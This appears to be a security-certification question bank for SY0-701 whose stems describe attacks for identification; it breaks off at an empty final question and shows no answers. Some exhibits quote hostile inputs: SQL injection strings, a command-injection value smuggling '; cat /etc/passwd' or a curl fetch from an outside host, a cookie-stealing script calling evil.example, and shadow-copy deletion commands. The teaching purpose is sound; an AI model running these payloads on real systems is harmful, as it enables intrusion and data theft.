© 2026 Courseiva. Courseiva is operated by JTNetSolutions Ltd. All rights reserved.

SY0-701 Threats, Vulnerabilities, and Mitigations • Complete Question Bank

SY0-701 Threats, Vulnerabilities, and Mitigations — All Questions With Answers

Complete SY0-701 Threats, Vulnerabilities, and Mitigations question bank: 265 questions with answers and detailed explanations. Free, no signup required.

Question 1 (medium, multiple choice)

A security analyst is reviewing web server logs from an e-commerce application. The logs show repeated requests containing URLs with appended strings such as: `' OR '1'='1' --` and `'; DROP TABLE Users; --`. The application returned HTTP 200 responses with unexpected data in several instances. Which type of attack is most likely being attempted?

Question 2 (medium, multiple choice)

A security analyst is reviewing the source code of a custom network service written in C. The service allocates a 256-byte buffer and uses the strcpy() function to copy incoming data into that buffer without verifying the length of the input. If an attacker sends a specially crafted payload that exceeds 256 bytes, which security control would be most effective at detecting and preventing the resulting exploitation at runtime?

Question 3 (medium, multiple choice)

A CFO at a mid-sized company receives an urgent email that appears to come from the CEO's email address, requesting an immediate wire transfer of $50,000 to a new vendor for a time-sensitive project. The email address displayed is 'ceo@cornpany.com' instead of the legitimate 'ceo@company.com'. The CFO follows the instruction and initiates the transfer. Later, the real CEO denies sending such a request. Which of the following security controls would have been MOST effective in preventing this type of attack from succeeding?

Question 4 (medium, multiple choice)

A user receives a phone call from someone who claims to be a member of the company's IT support team. The caller states that the user's account has been compromised and requests the user's username, password, and the current multi-factor authentication (MFA) code to 'verify identity and secure the account.' Which type of social engineering attack is being attempted?

Question 5 (medium, multiple choice)

A security analyst is reviewing the source code of a custom authentication service. The service uses a function that compares a user-supplied password to the stored password hash by iterating through each byte and returning false immediately upon the first mismatch. The analyst measures the function's execution time and discovers it varies measurably depending on how many initial bytes match. Which type of attack is this vulnerability most likely to facilitate?

Question 6 (medium, multiple choice)

A security analyst is reviewing the results of a dynamic application security test (DAST) on a new e-commerce application. The report indicates that the application's product search functionality is vulnerable to blind SQL injection. The analyst is tasked with recommending a remediation to the development team. The developers currently concatenate user input directly into SQL queries. Which of the following recommendations would most effectively and permanently mitigate this vulnerability?

Question 7 (medium, multiple choice)

A security analyst is reviewing authentication logs from a corporate web application. The logs show thousands of failed login attempts over the past hour. Each attempt uses a different username, but all attempts use the same password 'Spring2024!'. The source IP addresses are widely distributed across several different geographic regions. Which type of attack is the analyst most likely observing?

Question 8 (medium, multiple choice)

A security analyst is investigating a series of alerts from the web application firewall. Users are reporting that when they view a product review page on the company's e-commerce site, their browser automatically redirects to a malicious website. The analyst examines the database and finds that a product review submitted by a user contains a <script> tag that loads a JavaScript file from an external domain. Which type of attack has occurred?

Question 9 (medium, multiple choice)

A security analyst is reviewing the session management implementation of a web application. The application generates session tokens by computing the MD5 hash of the concatenation of the username and the current server timestamp rounded to the nearest hour. An attacker has obtained a valid session token for her own account and discovers that she can forge tokens for other users by simply substituting the username in the hash calculation with a known target username. Which type of attack is the web application most vulnerable to?

Question 10 (medium, multiple choice)

A security analyst is reviewing the source code of a custom web application. The application receives JSON data from users, which includes a 'type' field. The application uses the 'type' field to determine which Java class to instantiate, and then calls a method on that object. The application does not validate or sanitize the 'type' field. An attacker sends a crafted JSON payload that causes the application to instantiate an unexpected class, leading to remote code execution. Which type of vulnerability does this example describe?

Question 11 (medium, multiple choice)

A security analyst is investigating a phishing campaign that specifically targets senior executives in a company. The emails appear to come from the CEO and request urgent wire transfers to a fraudulent account. Which of the following best describes this type of attack?

Question 12 (medium, multiple choice)

A security analyst discovers that an organization's web application is vulnerable to SQL injection. The application uses a legacy database driver that does not support parameterized queries. Which of the following is the BEST mitigation to prevent this vulnerability?

Question 13 (medium, multiple choice)

A security analyst reviews authentication logs and discovers hundreds of failed login attempts from a single external IP address within a five-minute window. All attempts target the same username 'jsmith' but use different passwords. Which type of password attack does this pattern most likely indicate?

Question 14 (medium, multiple choice)

A security analyst discovers that an attacker maintained persistent access to a corporate network for six months, moving laterally between systems and exfiltrating sensitive data. The attacker used custom malware that evaded antivirus and established multiple backdoors. Which of the following best describes this type of threat actor and their campaign?

Question 15 (medium, multiple choice)

A security analyst reviews authentication logs and notices multiple failed login attempts using various usernames from a single IP address over several hours. Eventually, a successful login occurs using a username that had many failed attempts. The organization requires multi-factor authentication (MFA). Which type of attack is most likely indicated by this pattern?

Question 16 (medium, multiple choice)

A security analyst receives an alert from the email security gateway about a message sent to an employee. The email has an attachment named 'Invoice_Q4_2024.exe'. The employee claims they did not open the attachment, and the email appears to come from a known vendor's domain but the sender address has a slight typo. Which type of attack is most likely being attempted?

Question 17 (medium, multiple choice)

A security analyst notices that several employees have received an email with the subject line 'Urgent: Password Reset Required'. The email contains a link to a website that mimics the company's internal login portal. The email was sent from an external domain and addresses recipients by 'Dear Employee' rather than their actual names. Which type of social engineering attack is being described?

Question 18 (medium, multiple choice)

A security analyst receives an alert about a user account attempting to access multiple network shares in rapid succession within a short time frame. The analyst reviews the logs and sees that the IP address originates from the internal network, but the user is currently on leave. Which type of attack is most likely occurring?

Question 19 (medium, multiple choice)

A security analyst receives a phone call from an individual claiming to be a member of the IT help desk. The caller states that an emergency security update requires the analyst's password immediately, and the request sounds urgent. The analyst notices the caller's voice is unfamiliar and the background noise is inconsistent with an office environment. Which type of social engineering attack is being attempted?

Question 20 (medium, multiple choice)

A security analyst is investigating a web application that allows users to input a filename to view its contents. The application passes the user input directly to a system command without sanitization. An attacker submits the input 'file.txt; cat /etc/passwd' and successfully retrieves the contents of the password file. Which type of attack occurred?

Question 21 (medium, multiple choice)

A security analyst receives reports that several employees are being redirected to a fraudulent login page after typing the correct URL for a company application into their browser. Further investigation reveals that the company's internal DNS server has been compromised. Which type of attack best describes this scenario?

Question 22 (medium, multiple choice)

A security analyst is reviewing logs after a successful phishing attack. The attacker used a fake login page that mimicked the company's single sign-on portal to harvest usernames and passwords. The attacker then used the stolen credentials to access the corporate email system. Which type of attack best describes the initial compromise?

Question 23 (medium, multiple choice)

A security analyst observes repeated outbound traffic from a single workstation to a known malicious IP address. The workstation's anti-malware software has reported no alerts, and the user claims to have only downloaded software from the company's approved application store. Which type of malware most likely explains this behavior?

Question 24 (easy, multiple choice)

Based on the exhibit, what should the employee do first?

Exhibit

Email message
From: Payroll Support <payroll-help@vendor-portal.example>
Subject: Urgent: Verify your account now
Body: We detected a payroll issue. Reply with the one-time code we just sent to your phone so we can restore your mailbox today. Failure to act within 10 minutes may suspend access.

Question 25 (easy, multiple choice)

An employee receives an email that appears to come from the company's payroll provider. It says payroll documents will be deleted today unless the employee signs in through the included link. What is the best first action?

Question 26 (easy, multiple choice)

A help desk technician reports several workstations are suddenly showing lots of pop-up ads and browser redirects after users installed a free media player. What type of unwanted software is most likely present?

Question 27 (medium, multiple choice)

A threat intelligence feed says an adversary rotates domains daily, uses cloud VPS hosting, and reuses the same malware sample across several campaigns. Analysts want the indicator that remains useful even when the domain changes. What should they prioritize?

Question 28 (easy, multiple choice)

Based on the exhibit, what type of social engineering attack is the caller using?

Exhibit

Help desk call transcript
Caller: "Hi, this is Morgan from the executive assistant team. The CFO is in a meeting and needs a transfer completed in the next 15 minutes. I am sending the approval right now. Please confirm the wire amount and account details over the phone so I can finish the request."

Question 29 (easy, multiple choice)

A user says their files suddenly have a new extension and a note appears demanding payment to restore access. Which type of malware is most likely involved?

Question 30 (medium, multiple choice)

An employee receives a text message from an unknown number pretending to be IT. It includes a shortened URL for "urgent MFA re-enrollment" and says the account will be locked in 15 minutes. What is the best response?

Question 31 (easy, multiple choice)

A security tool reports repeated DNS requests for long, random-looking subdomains under the same domain name. What is the most likely explanation?

Question 32 (medium, multiple choice)

EDR alerts show a finance laptop spawning an unsigned executable from %AppData%, attempting to read LSASS memory, and making outbound HTTPS connections to a rare domain. The user says they only opened a spreadsheet attachment. What is the best immediate action?

Question 33 (medium, multiple choice)

An attacker calls the service desk claiming to be a traveling contractor whose phone was stolen. They know the contractor's manager name and ask for an MFA reset to a new number 'just for today.' Which control would best reduce the success of this attack?

Question 34 (medium, multiple choice)

A caller claims to be from the company's SaaS provider and says a tenant migration will fail unless the help desk reads back a one-time verification code sent to an administrator's phone. The caller knows the admin's name and ticket number. What attack technique is being used?

Question 35 (easy, multiple choice)

Threat intelligence shows an attacker changes the domain name every day, but the malware file hash stays the same across incidents. What should defenders prioritize for blocking?

Question 36 (medium, multiple choice)

Finance staff receive an email from the 'CFO' using a lookalike domain. The message requests an urgent gift-card purchase, says the recipient must keep it confidential, and pressures them to skip normal approval steps. What attack is this most likely?

Question 37 (hard, multiple choice)

Based on the exhibit, which indicator should the security team prioritize for endpoint detection and hunting?

The attacker rotates infrastructure frequently, but one artifact has remained consistent across recent investigations.

Exhibit

Threat intelligence note:
- Delivery domains change daily using disposable VPS providers
- File hashes vary because the payload is repacked for each campaign
- Email lure wording changes weekly
- The malware consistently creates a mutex named `Global\WkSvcHost_0F92`
- One case also showed a registry key under `HKCU\Software\SysTools\Cache` but that key was not present in every sample

Question 38 (hard, multi-select)

A support portal lets users upload files and name them manually. During review, a tester submits a filename containing path traversal sequences, and logs later show the application trying to access files outside the intended upload folder. Which two changes best address the flaw? Select two.

Question 39 (easy, multiple choice)

A finance manager gets a phone call from someone claiming to be the CEO's assistant, urgently requesting a wire transfer before a board meeting. What type of attack is this?

Question 40 (medium, multiple choice)

A threat report says an attacker changes domains daily and rehosts infrastructure in cloud VPS environments, but the phishing email wording, login-page flow, and PowerShell download behavior remain the same. What type of information is most useful for a durable detection rule?

Question 41 (medium, multiple choice)

A workstation opens an attachment labeled as an invoice and then begins creating scheduled tasks, disabling security services, and contacting a known malicious IP address. What is the best first containment action?

Question 42 (medium, multiple choice)

A user's laptop suddenly shows encrypted .docx files, a ransom note, and the EDR console reports mass file renames and shadow copy deletion. The device is still online and connected to the corporate VPN. What is the best immediate action?

Question 43 (easy, multiple choice)

A caller says they are from the help desk and need the employee's MFA code to "complete a password reset". Which social engineering technique is being used?

Question 44 (medium, multiple choice)

A vulnerability scan finds two issues: a critical deserialization flaw on a non-production lab server behind a VPN, and a high-severity privilege escalation flaw on the production jump server that administrators use to reach the rest of the environment. Which should be remediated first?

Question 45 (hard, multi-select)

A report generator accepts a user-supplied report name and then passes it into a shell command to convert a file. During testing, a malicious value causes the server to run an unexpected system command. Which two changes best mitigate this issue while keeping the feature usable? Select two.

Question 46 (hard, multiple choice)

Based on the exhibit, what is the BEST fix for the vulnerability being exploited?

A user with a standard account can retrieve documents by changing the `docId` value in the request. The application returns another employee's file without any authorization error.

Exhibit

Web server access log excerpt:
10:41:12 GET /portal/document?docId=4411 200 user=jcarter
10:41:14 GET /portal/document?docId=4412 200 user=jcarter
10:41:15 GET /portal/document?docId=4413 200 user=jcarter

Application debug log:
[INFO] Document lookup completed successfully.
[WARN] No authorization check performed after object lookup.
[INFO] Returned file owner: finance2

Question 47 (easy, multiple choice)

A vulnerability scan finds a critical flaw on an internet-facing SFTP gateway with public exploit code, and a high-severity flaw on an internal lab server that is only reachable from a restricted subnet. Which should be remediated first?

Question 48 (hard, multi-select)

A file server used by a shared service account begins renaming documents, deleting shadow copies, and creating outbound SMB connections to many internal hosts. The SOC suspects the malware may be spreading while also encrypting data. Which two actions are the best immediate containment steps? Select two.

Question 49 (easy, multiple choice)

A workstation suddenly begins making SMB connections to many internal servers within a few minutes. What is the best immediate response?

Question 50 (easy, multiple choice)

A vulnerability scan finds a critical flaw on an internet-facing VPN appliance and says public exploit code is already available. Which issue should be remediated first?

Question 51 (hard, multiple choice)

Based on the exhibit, what is the MOST likely activity taking place on the network?

A user opened a spreadsheet shortly before unusual internal connection patterns began. The same account is now authenticating to many hosts in rapid succession.

Exhibit

NetFlow and Windows event excerpt:
Host: WS-22 (10.20.5.18)
14:31 10.20.5.18 -> 10.20.5.41 TCP/445
14:32 10.20.5.18 -> 10.20.5.43 TCP/5985
14:32 10.20.5.18 -> 10.20.5.47 TCP/445
14:33 10.20.5.18 -> 10.20.5.52 TCP/5985
14:34 10.20.5.18 -> 10.20.5.61 TCP/445

Security log highlights:
Event 4769 spike for user ACME\rlopez
Event 7045: Service created on 10.20.5.43 named "PSEXESVC"
Multiple hosts show remote logon type 3 from WS-22

Question 52 (medium, multiple choice)

A development team wants to allow users to search orders by customer name and date range. Logs show the team currently concatenates the filter values into SQL strings. Which change best reduces SQL injection risk without removing the search feature?

Question 53 (easy, multiple choice)

Based on the exhibit, what type of malware is most likely present?

Exhibit

Host activity log
11:22:08  Command executed: vssadmin delete shadows /all /quiet
11:22:15  Files in Finance share renamed with extension .enc
11:22:21  Ransom note created: READ_ME_NOW.txt
11:22:28  Multiple user documents no longer open correctly

Question 54 (medium, multiple choice)

A file-sharing portal uses a download URL like /download?file=12345. A tester changes the value to 12346 and can access another department's document without logging in again. Which control most directly prevents this issue?

Question 55 (hard, multi-select)

An EDR alert shows a finance workstation launching rundll32 from %AppData%, creating a scheduled task, and making repeated HTTPS beacons to a rare domain. The user still has open accounting files, and the SOC wants to slow spread without losing evidence. What two actions should be taken first? Select two.

Question 56 (easy, multiple choice)

An employee receives an email that appears to come from payroll and asks them to open a link to "confirm direct deposit details". The link goes to a site with a slightly misspelled company name. What should the employee do first?

Question 57 (easy, multiple choice)

Based on the exhibit, which indicator should defenders prioritize for detecting future activity from this campaign?

Exhibit

Threat intelligence note
Campaign summary:
- Malicious domains change every 24 hours
- Executable file hash stays the same across samples
- TLS certificate fingerprint remains:
  4F:91:2C:AA:7D:10:88:6B:...
- User agent string varies by host

Question 58 (medium, multiple choice)

A scan reports a critical remote code execution vulnerability on an internet-facing VPN appliance with public proof-of-concept exploit code available. It also reports a critical local privilege escalation on an isolated lab workstation. Patch windows are limited this week. Which should be remediated first?

Question 59 (easy, multiple choice)

A user's laptop suddenly starts renaming many files and showing a ransom note. The laptop is still connected to Wi-Fi. What is the best immediate action?

Question 60 (hard, multiple choice)

Based on the exhibit, what is the BEST remediation for the application flaw shown?

A user-controlled parameter is being passed to a shell command on the server. The application is intended to test connectivity to approved internal hosts only.

Exhibit

Application log excerpt:
15:08:02 POST /tools/pingHost host=10.0.0.15
15:08:02 Application executed: /bin/sh -c "ping -c 1 10.0.0.15"
15:09:11 POST /tools/pingHost host=10.0.0.15;curl%20http://198.51.100.55/s
15:09:11 Application executed: /bin/sh -c "ping -c 1 10.0.0.15;curl http://198.51.100.55/s"
15:09:12 Outbound HTTPS session established to 198.51.100.55

Question 61 (easy, multiple choice)

NetFlow shows one workstation opening SMB connections to a dozen internal servers and then attempting many WinRM connections. What is the most likely explanation?

Question 62 (medium, multiple choice)

A user reports receiving repeated MFA push requests even though they are not logging in. Later, someone calls and claims to be IT, asking the user to approve one prompt so support can finish a password reset. Which control would best reduce the success of this attack?

Question 63 (easy, multiple choice)

During testing, a login form returns all user records when the tester enters ' OR '1'='1 in a username field. What is the best fix for this issue?

Question 64 (hard, multi-select)

A scan returns five findings. Which two should be remediated first based on real-world risk? Select two.
- A) Internet-facing SSO gateway, CVSS 8.8, public exploit code, and auth bypass impact.
- B) Internal print server, CVSS 9.8, no known exploit, isolated VLAN, no sensitive data.
- C) File server with regulated customer records, CVSS 6.5, active exploitation in the wild, reachable from VPN.
- D) Lab hypervisor, CVSS 7.5, no exploit, scheduled retirement next month, used only by testers.
- E) Dev wiki, CVSS 5.0, no exploit, no sensitive data.

Question 65 (medium, multiple choice)

NetFlow shows one user workstation making authenticated SMB and WinRM connections to more than 40 internal hosts within 15 minutes, starting shortly after the user opened a spreadsheet attachment. No approved admin tool was running on the device. What is the best initial response?

Question 66 (medium, multiple choice)

SIEM alerts show one workstation making SMB connections to 30 internal hosts within 10 minutes, followed by remote service creation and repeated access attempts to admin shares. The workstation also begins authenticating with several privileged accounts. What is the most likely activity?

Question 67 (medium, multiple choice)

During testing, entering ' OR '1'='1 into a login field returns all user records instead of rejecting the input. What is the best fix to address this flaw?

Question 68 (medium, multiple choice)

After a new search feature goes live, logs show requests containing `UNION SELECT` and the application returns database error messages. Security testing confirms attackers can retrieve rows from other tables by modifying the query string. Which fix is best?

Question 69 (medium, multiple choice)

Threat intelligence reports that an adversary changes domains daily and uses disposable cloud hosting, but the malware binary hash and a unique mutex name remain unchanged across incidents. Which indicator is the best candidate for immediate detection rule creation?

Question 70 (easy, multiple choice)

A user's laptop starts renaming many documents, and a ransom note appears on the desktop. What is the best immediate action for the help desk to recommend?

Question 71 (hard, multiple choice)

Based on the exhibit, what is the BEST immediate containment action?

The workstation is still powered on, and the user reports that files are being renamed and the system is running very slowly. The security analyst confirms malicious activity is in progress.

Exhibit

EDR event timeline:
14:02:11 excel.exe spawned powershell.exe with -enc parameter
14:02:13 powershell.exe created scheduled task: "OneDrive Update"
14:02:18 explorer.exe began renaming multiple .docx files to .lock
14:02:21 outbound HTTPS connection to 198.51.100.77:443
14:02:24 security service attempted to terminate, then recovered

Question 72 (medium, multiple choice)

During triage, you see a legitimate browser process spawning powershell.exe with an encoded command, followed by an outbound connection to a newly registered domain. No new executable is written to disk. Which malware characteristic best fits this behavior?

Question 73 (easy, multiple choice)

A user reports that their laptop is showing frequent pop-up ads, the browser homepage keeps changing, and the system has become noticeably slower. What is the most likely immediate containment action?

Question 74 (medium, multiple choice)

NetFlow shows one workstation initiating SMB and WinRM sessions to 25 internal servers within 12 minutes, followed by a spike in Kerberos authentication requests and attempts to access admin shares. The user says they only opened an invoice spreadsheet. What is the most likely attacker objective?

Question 75 (easy, multiple choice)

A scan finds two issues: a critical vulnerability on an internet-facing VPN appliance with public exploit code, and a medium-severity issue on an internal test server. Which should be fixed first?

Question 76 (easy, multiple choice)

Threat intelligence shows an attacker changes domains every day, but the malware file itself stays the same across incidents. Which indicator would be the best to block immediately if you find it in your environment?

Question 77 (hard, multi select)

Threat intelligence reports a campaign that rotates domains daily and repacks the malware for each delivery. Analysts also observe the same TLS certificate fingerprint, the same mutex name, and the same JA3 client fingerprint across multiple samples. Which three indicators are most useful to prioritize for hunting or blocking? Select three.

Question 78 (easy, multiple choice)

Analysts see a malware campaign that changes its command-and-control domain every day, but the executable hash and a unique registry value remain the same across incidents. Which indicator is the best candidate for hunting?

Question 79 (easy, multiple choice)

A worker receives a text message from someone claiming to be the company's HR partner. The message says a benefits portal issue will be fixed only if the worker clicks a link and logs in right away. What type of attack is this most likely?

Question 80 (medium, multiple choice)

A procurement clerk receives a text message from someone claiming to be a supplier account manager. The message says a recent payment failed and asks the clerk to update bank details through a link to a secure portal. What should the clerk do first?

Question 81 (hard, multiple choice)

Based on the exhibit, which issue should be remediated FIRST?

The team can only fully fix one issue today. Management wants the choice that best reduces real-world risk, not just the highest severity score.

Exhibit

Vulnerability scan summary:

1) Internet-facing VPN appliance
   CVSS: 8.8
   Exploit status: public proof-of-concept available
   Exposure: reachable from the internet
   Compensating controls: none

2) Internal HR file server
   CVSS: 9.8
   Exploit status: no public exploit yet
   Exposure: reachable only from the employee VLAN
   Compensating controls: segmented network and MFA for admin access

3) Lab workstation
   CVSS: 10.0
   Exploit status: public exploit available
   Exposure: isolated lab VLAN with no routing to production

4) DMZ reporting server
   CVSS: 7.5
   Exploit status: public exploit available
   Exposure: internet-reachable, but protected by WAF and IP allowlisting

Question 82 (easy, multiple choice)

A SIEM alert shows one workstation connecting to many internal systems over SMB in a short period of time, followed by attempts to access administrative shares. What is the best response?

Question 83 (hard, multi select)

An accounts payable clerk receives an email that appears to come from a long-time vendor. The message asks for an urgent change to bank routing information, says the CFO is traveling, and requests that no one call back because the matter is confidential. The display name looks legitimate, but the reply-to address is different from the sender identity. Which three findings most strongly indicate a pretexting or business email compromise attempt? Select three.

Question 84 (hard, multiple choice)

Based on the exhibit, what is the MOST likely explanation for the network traffic?

The affected host is not showing a large amount of internet-bound traffic, but its DNS behavior is highly unusual.

Exhibit

DNS query log excerpt:
Host: CORP-LT-17
16:18:02 a9f3d1k2d.update-check.com A NXDOMAIN
16:18:03 b7p9q2s1n.update-check.com A NXDOMAIN
16:18:04 k8z1m4c7r.update-check.com A NXDOMAIN
16:18:05 u3n6t9x0v.update-check.com A NXDOMAIN
16:18:06 9q2m7a4p1.update-check.com A NXDOMAIN

Proxy log excerpt:
No corresponding HTTP or HTTPS sessions observed
TTL observed: 60 seconds on all queries

Question 85 (medium, multiple choice)

A scan finds two issues: a critical flaw on a lab server reachable only through VPN, and a high-severity flaw on an internet-facing file transfer appliance with active exploitation in the wild. Which should be remediated first?

Question 86 (hard, multiple choice)

Based on the exhibit, what is the BEST response by the employee?

The message appears to come from a trusted internal support team, but the sender details and request do not align with normal procedures.

Exhibit

Email header and body excerpt:
From: "IT Helpdesk" <help@corp-support.example>
Reply-To: support@mail-secure-login.com
Subject: URGENT: MFA re-sync required

Body:
"Your mailbox will be suspended in 15 minutes. To complete the repair, reply with the 6-digit code that was just sent to your phone. If you do not respond now, your account will be locked."

Question 87 (medium, multiple choice)

A security team suspects a rootkit after seeing hidden processes, boot-time persistence, and altered system files on a laptop. What is the best next step after confirming the suspicion?

Question 88 (easy, multiple choice)

A web form stores a user's comment and later displays it to other users. A tester submits <script>alert(1)</script> and the script runs in the browser. What vulnerability is this?

Question 89 (easy, multiple choice)

An employee receives an email from someone claiming to be from IT. The message says the employee must read back a one-time verification code so their mailbox can be 'repaired.' What social engineering technique is being used?

Question 90 (hard, multi select)

NetFlow and authentication logs show one workstation opening SMB and WinRM sessions to many internal hosts within ten minutes. The same source also generates a sharp rise in Kerberos service-ticket requests and attempts to access administrative shares. Which three observations most strongly support lateral movement rather than normal admin activity? Select three.

Question 91 (hard, multiple choice)

A Java web service accepts a Base64-encoded `profile` object from the browser. During testing, changing a serialized field from `role=user` to `role=admin` causes a deserialization error unless the original signed blob is reused. When a captured valid blob is modified only slightly, the application reconstructs a different class and then exposes an internal admin page. Which attack pattern is most likely?

Question 92 (medium, multiple choice)

A help desk technician reviews a ticket where a user says they logged out of the payroll portal, but another employee who found the session cookie in a browser debug log could still access the account until the session expired. Which attack best matches this behavior?

Question 93 (medium, multiple choice)

A web login form uses unsanitized input in the backend query. When an attacker enters `' OR '1'='1'--` into the username field, the application grants access without a valid password. Which attack pattern is being used?

Question 94 (medium, multiple choice)

A public-facing file transfer server is running an appliance firmware version that is now end-of-life. The vendor has stated that no further security patches will be released. Management wants the best long-term fix before the next audit. What should be done?

Question 95 (easy, multiple choice)

A forum lets users save a profile signature. One user enters a string containing script code, and later other users who view that profile see the script run in their browsers. What attack is this?

Question 96 (medium, multiple choice)

During troubleshooting, several hosts in VLAN 20 lose access to the default gateway at random. Their ARP caches now map the gateway IP to a workstation MAC address, and traffic briefly flows through that workstation before timing out. What attack is most likely?

Question 97 (medium, multiple choice)

Based on the exhibit, what type of malware behavior is most likely occurring?

Exhibit

EDR timeline from a finance laptop:

08:14:02 winword.exe launched powershell.exe
08:14:03 powershell.exe executed with arguments: -WindowStyle Hidden -NoProfile -EncodedCommand SQBFAFgAKAAuLi4=
08:14:05 No new executable written to disk
08:14:08 Outbound HTTPS connection to 198.51.100.77 over port 443
08:14:11 User reports a document opened normally, but the machine began showing unusual network activity

Question 98 (easy, multiple choice)

A vulnerability scan reports that a public web server is running an operating system version that no longer receives security updates. Which issue is present?

Question 99 (hard, multiple choice)

After a switch reboot in a conference room, several laptops obtain valid IP addresses in the correct subnet, but their default gateway changes to 10.20.40.50, which is not the legitimate router. Packet capture shows DHCP offers coming from a MAC address that does not belong to the approved DHCP server, and the rogue device responds faster than the real server. What attack is most likely occurring?

Question 100 (medium, multiple choice)

Based on the exhibit, what type of web attack is most likely taking place?

Exhibit

Web application log excerpt:

Request: GET /search?q=acme' OR '1'='1'-- HTTP/1.1
Response: 500 Internal Server Error
Database log: syntax error near "OR" at line 1
Developer note: the search feature appends user input directly into the SQL query string without parameterization.

Question 101 (easy, multiple choice)

A web portal builds its database query by directly appending a user's search input. When the user types a single quote, the application returns a database error. Which attack is most likely?

Question 102 (easy, multiple choice)

At a conference, employees connect to a Wi-Fi network named "CorpGuest" and then see certificate warnings in their browsers. The network has a stronger signal than the hotel's legitimate guest Wi-Fi. What attack is this?

Question 103 (medium, multiple choice)

Based on the exhibit, what security issue is most likely present?

Exhibit

Configuration review output from a new network camera deployment:

Interface status:
  0.0.0.0:8080   LISTEN  camera-web
  0.0.0.0:554    LISTEN  rtsp-stream
Admin banner:
  Firmware version 1.0.3
  Admin login: enabled
  Password policy: not enforced
Firewall ACL:
  allow tcp any any eq 8080
  allow tcp any any eq 554

Question 104 (easy, multiple choice)

A user enters `<script>alert('test')</script>` into a public comment field, and other visitors see the script run in their browsers. What attack is this?

Question 105 (medium, multiple choice)

Based on the exhibit, what network attack is most likely occurring on the office LAN?

Exhibit

Network capture summary:

Host 10.20.14.25 sends ARP requests for 10.20.14.1
Multiple ARP replies received:
10.20.14.1 is-at 02:42:ac:11:00:05
10.20.14.1 is-at 02:42:ac:11:00:05
10.20.14.1 is-at 66:77:88:99:aa:bb
Client gateway cache alternates between the legitimate gateway MAC and 66:77:88:99:aa:bb every few seconds.
Users report brief certificate warnings when opening internal sites.

Question 106 (hard, multiple choice)

A SaaS portal issues signed JWTs in a browser cookie. The help desk confirms a user logged out at 09:10, but SIEM logs show the same token was accepted from a different IP at 09:12 and continued working until the token expired. The application does not keep a server-side revocation list. What weakness is most likely being abused?

Question 107 (easy, multi select)

An employee receives a text message from "IT Help" saying their account will be disabled unless they tap a link and enter a one-time code. Five minutes later, someone calls claiming to be from IT and asks the employee to read back the same code. Which two social engineering delivery methods are used? Select two.

Question 108 (medium, multiple choice)

A customer service application shows the same session ID being used from two countries within five minutes. The legitimate user did not report a password change, but an order shipping address was modified successfully without reauthentication. What attack pattern is most likely?

Question 109 (easy, multiple choice)

After installing a free utility from an unofficial website, a user's laptop starts quietly sending browsing data to an unknown server. What type of malware is most likely present?

Question 110 (easy, multiple choice)

A vulnerability scan finds an administrative SSH service listening on 0.0.0.0 on a server that should be managed only from the internal network. What is the main security issue?

Question 111 (medium, multiple choice)

Based on the exhibit, which malware type is most likely involved?

Exhibit

File server FS-02:

C:\Shared\Finance\Q4\APR_invoice.xlsx -> APR_invoice.xlsx.locked
C:\Shared\Finance\Q4\Budget2026.docx -> Budget2026.docx.locked
C:\Shared\Finance\Q4\README_RECOVER.txt created in every directory

Command history from the server console:
vssadmin delete shadows /all /quiet
wmic shadowcopy delete

Users report they can see filenames but cannot open the files.

Question 112 (hard, multiple choice)

A scan of a web server hosting an internal help-desk portal reports these findings: `/var/www/uploads` is world-writable by the application account, PHP files in that directory are executed by Apache, and the app allows users to upload images without content-type validation. Which issue should be remediated first to most reduce the chance of remote code execution?

Question 113 (easy, multiple choice)

Several employees receive a text message that says their payroll deposit failed and they must tap a link to verify account details. The link opens a fake login page. What type of attack is this?

Question 114 (medium, multiple choice)

A SOC analyst sees repeated encoded PowerShell launched by mshta.exe. No new executable is written to disk, but the host makes periodic outbound connections to the same IP. Which malware characteristic is most likely?

Question 115 (medium, multiple choice)

After a user installs a free PDF converter from an unofficial site, the browser homepage changes, the endpoint protection agent stops launching, and the system begins making periodic outbound connections to the same unfamiliar IP address. No exploit was used during installation, and the installer appeared legitimate. What type of malware best matches this behavior?

Question 116 (medium, multiple choice)

Based on the exhibit, which social engineering attack is most likely?

Exhibit

From: BrightStone Invoices <billing@brightstone-payments.com>
Reply-To: Accounts Payable <ap@brightstone-invoices.net>
Subject: Updated remittance details for PO 44718

Hello Dana,

Please see the attached invoice addendum for the Orion office renovation project we completed last month. To avoid a late fee, send the balance today to the new bank account listed in the PDF.

Thank you,
BrightStone Billing

Question 117 (hard, multiple choice)

EDR on a workstation shows winword.exe spawning powershell.exe with hidden, no-profile, and encoded arguments. No new executable is written to disk. Minutes later, a scheduled task creation is blocked, but the same host continues making HTTPS requests to a cloud IP address. Which malware category best fits this behavior?

Question 118 (easy, multiple choice)

A file server suddenly renames documents with a new extension and displays a note demanding payment in cryptocurrency to restore access. What type of malware is most likely involved?

Question 119 (medium, multiple choice)

Users in a warehouse report an SMS claiming a missed delivery. The link opens a login page that closely matches the company portal, and several users later receive unauthorized password reset emails. What attack is most likely?

Question 120 (medium, multiple choice)

During a conference, several employees connect to a wireless network named the same as the hotel's guest Wi-Fi. Shortly after connecting, they receive certificate warnings when accessing the company portal, and packet capture shows a nearby laptop advertising the same SSID and relaying traffic. What type of attack is most likely?

Question 121 (medium, multiple choice)

A SOC analyst investigates a host after an employee opens an invoice attachment. The endpoint shows PowerShell running in a hidden window, no new executable files are created on disk, and the same suspicious activity returns after a reboot. What is the most likely attack type?

Question 122 (easy, multiple choice)

An employee receives a text message saying their payroll account is locked and asks them to tap a link and enter a one-time passcode. What type of attack is this?

Question 123 (easy, multiple choice)

A web login form returns access after a tester enters `' OR '1'='1'--` into the username field. What type of attack is this?

Question 124 (medium, multiple choice)

An accounts payable clerk receives an email that continues a real vendor conversation from last week. The sender domain is only one character different from the vendor's real address. The message says the invoice is overdue and asks the clerk to update the payment account before the end of the day. What is the best next action?

Question 125 (easy, multiple choice)

After a user installs a free PDF converter from an unofficial website, the laptop starts making periodic outbound connections to an unknown server, the browser homepage changes, and a new program launches at logon. What is the most likely malware type?

Question 126 (hard, multiple choice)

A finance laptop is opened to review an invoice attachment. EDR then shows winword.exe launching powershell.exe with hidden, no-profile, and base64-encoded arguments. No executable is written to disk, network beacons begin from memory, and after a reboot the activity disappears unless the document is opened again. What type of malware behavior is most likely?

Question 127 (medium, multiple choice)

Based on the exhibit, what vulnerability is the application most likely suffering from?

Exhibit

Support ticket excerpt:

A customer posted the following in a public product review field:
<script>fetch('https://evil.example/steal?c='+document.cookie)</script>

The same script later appeared in the review page for other visitors, and the security team found several unexpected requests to the attacker-controlled domain.

Question 128 (medium, multiple choice)

